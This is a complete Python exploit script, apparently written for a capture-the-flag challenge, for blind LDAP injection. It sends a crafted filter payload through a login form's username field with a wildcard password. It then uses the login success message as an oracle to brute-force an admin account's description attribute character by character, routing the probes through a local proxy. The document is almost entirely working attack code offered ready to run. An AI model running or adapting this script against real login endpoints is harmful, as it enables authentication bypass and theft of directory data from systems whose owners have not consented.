Blind LDAP Data Exfiltration

import requests
url = 'TARGET'  # login endpoint whose username/password land in an LDAP filter; replace before running
onward = 'successful'  # substring of the response that marks a successful login (the oracle's "true")
sucks = 'Login failed!'  # failure text; not referenced by the code below
# Characters tried at each position, in this order. LDAP filter metacharacters
# (*, (, ), backslash, NUL) are deliberately absent: the prefix is injected
# unescaped, so they would change the filter's meaning instead of matching a
# literal character.
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&_-+=,./?{}[]|<>:;"
# Route every probe through a local intercepting proxy (e.g. Burp on 8080) so
# the injected filters can be inspected; builder() passes verify=False because
# the proxy's TLS certificate is not in the system trust store.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}
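def builder(prefix, *, timeout=10):
    """Probe whether the admin entry's ``description`` starts with *prefix*.

    Sends one login attempt whose username field carries an LDAP filter
    injection and reports whether the response contains the success marker
    ``onward``.

    Args:
        prefix: Candidate prefix of the description value. It is injected
            unescaped, so it must not contain LDAP filter metacharacters
            (``*``, ``(``, ``)``, backslash, NUL) — they would change the
            meaning of the filter rather than be matched literally.
        timeout: Seconds to wait for the connection/response before giving up.

    Returns:
        True if the response body contains ``onward``, i.e. the injected
        ``(description=prefix*)`` clause matched; False otherwise.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    # Close the application's own username clause, OR in a wildcard match on
    # description, and collapse the password clause with "*".
    # NOTE(review): this presumes the server builds a filter shaped like
    # (&(uid=<username>)(userPassword=<password>)) — confirm against the target.
    username_payload = f"*admin*)(|(description={prefix}*)"
    password_payload = "*"
    data = {
        "username": username_payload,
        "password": password_payload,
    }
    # verify=False: traffic goes via the local intercepting proxy, whose CA is
    # not trusted by the system store. The explicit timeout keeps the
    # character-by-character loop from hanging on a stalled connection.
    r = requests.post(url, data=data, proxies=proxies, verify=False, timeout=timeout)
    return onward in r.text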

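def brutforce(probe=None, charset=None, max_len=None):
    """Recover the admin description one character at a time.

    Extends the known prefix by trying every character of *charset* in
    order and keeping the first one the oracle accepts, until no candidate
    matches (or *max_len* is reached).

    Args:
        probe: Oracle ``prefix -> bool``; defaults to :func:`builder`.
        charset: Candidate characters, tried in order; defaults to ``CHARSET``.
        max_len: Optional cap on the recovered length; ``None`` means unbounded.

    Returns:
        The recovered string. Extraction stops at the first character that is
        absent from *charset* (metacharacters such as ``*``, ``(``, ``)`` and
        backslash are deliberately excluded), so "done" only means no
        candidate matched — it does not prove the whole value was recovered.
    """
    if probe is None:
        probe = builder
    if charset is None:
        charset = CHARSET

    found = ""
    while max_len is None or len(found) < max_len:
        # First accepted character wins. NOTE(review): substring matching on
        # description is typically case-insensitive in LDAP, so with lowercase
        # listed first the recovered casing may differ from the stored value.
        match = next((c for c in charset if probe(found + c)), None)
        if match is None:
            print("done")
            break
        found += match
        print(f"[+] Found character: '{match}' → Current description: {found}")

    return found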

def main():
    """Entry point: run the blind extraction and print what was recovered."""
    print("[*] Brute-forcing description attribute of admin…")
    description = brutforce()
    print(f"[!] Flag = '{description}'")


if __name__ == "__main__":
    main()
